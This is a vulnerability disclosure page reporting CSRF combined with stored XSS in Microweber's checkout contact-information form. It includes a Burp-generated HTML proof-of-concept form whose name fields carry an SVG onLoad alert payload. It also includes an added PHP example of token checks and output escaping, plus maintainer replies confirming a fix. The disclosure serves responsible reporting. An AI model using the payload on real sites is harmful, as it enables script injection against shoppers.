Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Jun 25th 2021


✍️ Description

Hello, I found CSRF + XSS on the website, so the impact of the XSS could be presented.

There is no CSRF token or protection on: http://example.microweber.me/checkout/contact-information-save

CSRF HTML PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.microweber.me/checkout/contact-information-save" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When we submit the request, the XSS gets executed at the same time. Also, the personal information always stays there, so it counts as Stored XSS.

Video of me showing everything: https://youtu.be/H9XTNUzdtHg

💥 Impact

JS executed in the victim's browser while the person is in Checkout.
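The two defects the report combines are a missing CSRF check on the save endpoint and unescaped output of the stored contact fields. The following is an added example, not Microweber's code or the code from the fix commit: a hypothetical hardened save handler that rejects requests without a valid session CSRF token and HTML-escapes every stored field at render time, so the report's `"><svg onLoad=alert(5555)>` value is stored as plain text and never becomes an element. Field names and the `_token` parameter are assumptions.

```php
<?php
// Added example (not Microweber's code). Assumes PHP sessions and that
// $_POST carries the fields from the report's PoC plus a "_token" field.
session_start();

function csrf_token(): string {
    // One random token per session, embedded in every state-changing form.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_valid(?string $submitted): bool {
    // A cross-site form cannot read the session token, so it cannot supply it.
    // hash_equals() gives a constant-time comparison.
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function save_contact_information(array $post): array {
    if (!csrf_valid($post['_token'] ?? null)) {
        http_response_code(403);
        return ['error' => 'invalid CSRF token'];
    }
    // Store values as submitted (length-limited); escaping is an output concern.
    $contact = [
        'first_name' => mb_substr(trim($post['first_name'] ?? ''), 0, 100),
        'last_name'  => mb_substr(trim($post['last_name'] ?? ''), 0, 100),
        'email'      => filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) ?: '',
        'phone'      => preg_replace('/[^0-9+ ]/', '', $post['phone'] ?? ''),
    ];
    $_SESSION['checkout_contact'] = $contact;
    return $contact;
}

function render_contact(array $contact): string {
    // Every stored field is entity-encoded before it reaches the checkout page.
    $e = fn(string $s) => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="first_name" value="' . $e($contact['first_name']) . '">'
         . '<input type="text" name="last_name" value="' . $e($contact['last_name']) . '">'
         . '<input type="hidden" name="_token" value="' . $e(csrf_token()) . '">';
}

// With the PoC payload as first_name, the rendered attribute contains
// &quot;&gt;&lt;svg onLoad=alert(5555)&gt; and the attribute is never broken out of.
```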

Z-Old
a year ago

Admin


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back a year ago
microweber/microweber maintainer validated this vulnerability a year ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer confirmed that a fix has been merged on 846a63 a year ago
The fix bounty has been dropped
microweber/microweber maintainer
a year ago

Hello, thanks for the report. This is a valid issue and it has been fixed now in this commit: https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf

kirareys
a year ago

Researcher


Nice, thanks for the attention :) Regards
